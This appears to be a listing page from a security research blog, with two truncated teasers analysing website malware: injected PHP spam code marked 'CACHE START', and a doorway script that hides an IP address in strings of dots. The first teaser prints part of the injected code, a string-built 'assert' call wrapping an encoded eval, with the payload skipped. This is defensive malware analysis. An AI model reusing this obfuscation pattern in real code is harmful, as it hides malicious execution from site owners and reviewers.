CACHE START Russian Spam

We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = “as”;$strings .= “sert”; @$strings(str_rot13(‘riny(onfr64_qrpbqr(“nJLtXTymp2I0XPEcLaLcXF…skipped…Tyvqwg9”));’)); //###=CACHE END=### This malware…
Read the Post
Labs Note

IP Obfuscation Using Dots ………

Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there. $adr1 = “………………………………………………………………………………………………………………………………………………………..”; $adr2 = “………………………………………………………………………………………………………………………………………………………………………………………………………………..”; $adr3…
Read the Post